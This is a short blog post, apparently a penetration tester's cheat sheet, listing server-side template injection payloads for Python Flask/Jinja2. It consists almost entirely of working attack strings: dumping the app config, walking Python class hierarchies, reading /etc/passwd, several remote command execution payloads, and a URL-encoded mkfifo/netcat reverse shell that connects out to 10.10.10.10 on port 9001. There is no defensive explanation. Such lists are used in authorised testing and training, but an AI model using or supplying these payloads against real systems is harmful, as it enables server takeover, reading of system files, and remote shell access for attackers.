Skip to main content

Posts

Showing posts from May, 2024

SSTI - Template Injection

By
  Python - Flask #List Items {{config.items()}} #Slecting a class {{5000.__class__.mro()}} #Listing Sub Classes {{5000.__class__.__mro__[1].__subclasses__()}} #Read Files {{5000.__class__.__mro__[1].__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read()}} #RCE - Use any 1 from below {{5000.__class__.__mro__[1].__subclasses__()[364]('whoami',shell=True,stdout=-1).communicate()}} {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} #Reverse Shell {{request.application.__globals__.__builtins__.__import__('os').popen('rm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|nc%2b 10.10.10.10 %2b 9001 %2b>/tmp/f').read()}}
Post a Comment
Read more